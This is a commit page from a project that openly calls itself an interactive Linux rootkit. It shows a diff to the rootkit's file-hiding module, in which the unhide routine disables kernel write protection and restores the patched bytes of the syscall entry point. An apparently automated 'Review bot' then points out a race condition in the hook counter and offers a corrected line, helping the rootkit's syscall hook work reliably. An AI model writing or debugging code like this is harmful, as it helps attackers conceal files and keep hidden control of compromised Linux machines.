linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 8e179427965a4d05e7d05bf306fa02ee857a3504
parent 05f785a35d79bb6035f712f2e5939845b8b9fdf6
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 11 Jan 2021 00:05:31 +0100

fix

Diffstat:
Msrc/filehide_lstar.c | 3++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -73,7 +73,8 @@ hide_files_lstar(void)
 void
 unhide_files_lstar(void)
 {
- if (atomic_dec_return(&syscall64_install_count) < 1) {
+ if (atomic_read(&syscall64_install_count) == 1) {
+ atomic_dec(&syscall64_install_count);
 disable_protection();
 memcpy((syscall_64_ptr + 1), &old_off, 4);
 enable_protection();
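Review bot: The `atomic_read(&syscall64_install_count) == 1` test followed by a separate `atomic_dec(&syscall64_install_count)` in `unhide_files_lstar` is no longer a single atomic step, so two concurrent callers can both observe 1, both decrement, and both run the write-back of `old_off` while the count goes negative. In the lines shown, a count above 1 is also never decremented, so unless an `else` branch outside the hunk handles it, the count stays put and the original bytes at `syscall_64_ptr + 1` are never restored once more than one install has happened. The commit appears to be guarding against an underflow when the count is already 0; one operation keeps that guard without the window: `if (atomic_dec_if_positive(&syscall64_install_count) == 0) {`. The function body continues past the end of the hunk, so the closing part of the branch is not visible here.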